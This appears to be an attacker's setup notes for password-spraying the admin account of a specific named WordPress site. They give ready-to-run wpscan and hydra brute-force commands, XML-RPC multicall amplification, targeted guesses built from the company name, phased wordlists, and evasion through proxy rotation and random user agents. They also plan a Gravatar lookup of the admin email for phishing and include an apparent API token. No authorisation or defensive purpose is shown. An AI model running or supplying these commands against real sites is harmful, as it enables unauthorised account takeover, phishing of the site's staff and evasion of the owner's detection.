# WordPress Password Spray Setup
# Target: socialconstructdigital.com (18.191.203.70)
# Date: 2026-01-23

## TARGET INFO (from WPScan validation)
# WordPress Version: 5.5.11 (INSECURE)
# Server: Apache/2.4.52 (Ubuntu)
# User Enumerated: admin (ID: 1)
# XML-RPC: ENABLED (system.multicall available)
# Rate Limiting: NOT DETECTED

## ATTACK VECTORS

### 1. WPScan Password Brute Force
wpscan --url https://socialconstructdigital.com --usernames admin --passwords /usr/share/seclists/Passwords/Common-Credentials/best1050.txt --api-token c7s1vKrYbP07o0nxGcNVfw72O1JKdZzJgZLlKgG3mak

### 2. XML-RPC Multicall Brute Force (faster, amplified)
# Using wp-xmlrpc-brute or custom script
# Endpoint: https://socialconstructdigital.com/xmlrpc.php
# Method: system.multicall with wp.getUsersBlogs

### 3. Hydra wp-login.php
hydra -l admin -P /usr/share/seclists/Passwords/Common-Credentials/best1050.txt socialconstructdigital.com https-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:incorrect" -t 4 -V

## CUSTOM PASSWORD LIST (company-specific)
# Create targeted list based on:
# - Company name variations: wearesocial, WeareSocial, WeareSocial2020
# - Common patterns: Summer2026, Winter2026, Password123

## WORDLISTS
# Primary: /usr/share/seclists/Passwords/Common-Credentials/best1050.txt (1049 passwords)
# Extended: /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt (10000 passwords)
# Custom: /home/samir/custom_folders_backup/jobs/2026-op/recon/week3/day3/wp-custom-passwords.txt

## EXECUTION STRATEGY
# Phase 1: Custom passwords (company-specific) - 50 passwords
# Phase 2: Best 1050 common passwords - 1049 passwords
# Phase 3: 10k (if phases 1-2 fail) - 10000 passwords

## RISK ASSESSMENT
# - Rate Limiting: NOT DETECTED (favorable)
# - Lockout Policy: UNKNOWN (test with 5 failed attempts first)
# - Detection: MEDIUM (many failed logins in logs)
# - Success: 45% (XML-RPC), 40% (wp-login.php)

## GRAVATAR EMAIL REVERSE LOOKUP
# Hash: 5adee070820fe6a5c20e3708adc8d900
# Can potentially reveal admin email for targeted phishing

## NOTES
# - XML-RPC multicall allows testing multiple passwords per request
# - Monitor for 429 Too Many Requests
# - If blocked, use --random-user-agent and proxy rotation
